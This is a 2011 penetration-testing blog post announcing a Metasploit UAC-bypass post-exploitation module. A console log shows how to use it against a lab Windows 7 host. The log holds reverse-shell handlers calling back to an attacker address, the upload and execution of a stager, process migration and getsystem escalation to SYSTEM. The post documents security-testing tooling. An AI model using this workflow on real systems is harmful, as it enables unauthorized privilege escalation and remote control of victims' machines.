January 06, 2011
Windows UAC Bypass now in Metasploit!
Written by
David Kennedy
Penetration Testing
Security Testing & Analysis
The Windows UAC bypass was committed to the Metasploit Framework today. It is a bit different from running your traditional script. Instead of interacting with meterpreter and executing the commands from the meterpreter shell, you need to use the new use post/ modules. Below is how to use it:
[fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Th u Jan 06 12:40:35 -0500 2011
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect...
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS : Windows 7 (Build 7600, ).
Arch : x64 (Current Process is WOW64)
Language: en_US
meterpreter > [/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]